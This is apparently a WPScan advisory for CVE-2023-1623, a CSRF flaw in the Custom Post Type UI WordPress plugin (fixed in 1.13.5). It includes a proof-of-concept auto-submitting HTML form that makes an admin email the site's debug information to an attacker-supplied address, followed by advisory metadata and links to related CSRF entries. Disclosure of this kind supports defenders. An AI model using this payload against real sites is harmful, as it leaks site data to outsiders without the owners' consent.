Custom Post Type UI < 1.13.5 – Debug Info Sending via CSRF | CVE 2023-1623 | Plugin Vulnerabilities

Description

The plugin does not properly check for CSRF when sending the debug information to a user supplied email, which could allow attackers to make a logged in admin send such information to an arbitrary email address via a CSRF attack.

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<body onload="document.forms[0].submit()">
<form action="http://example.com/wp-admin/admin.php?page=cptui_tools&action=debuginfo" method="POST">
    <input type="text" name="cptui_debuginfo_nonce_field" value="">
    <input type="text" name="cptui_debug_info_email" value="attacker@domain.com">
    <input type="submit" value="submit">
</form>
</body>

Affects Plugins

custom-post-type-ui

Fixed in 1.13.5

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

a04d3808-f4fc-4d77-a1bd-be623cd7053e

Timeline

Publicly Published

2023-04-03 (about 2 years ago)

Added

2023-04-03 (about 2 years ago)

Last Updated

2023-04-03 (about 2 years ago)

Other

Published

Title

Published

2025-01-24

Title

Modal Window < 6.1.5 - Cross-Site Request Forgery to Settings Ipdate

Published

2025-04-10

Title

WPJobBoard < 5.11.1 - Cross-Site Request Forgery to Remote Code Execution

Published

2025-09-22

Title

Custom Post Type Images <= 0.5 - Cross-Site Request Forgery

Published

2025-12-02

Title

Quiz Maker < 6.7.0.83 - Cross-Site Request Forgery

Published

2024-04-11

Title

Side Menu Lite < 4.2.1 - Menu Deletion via CSRF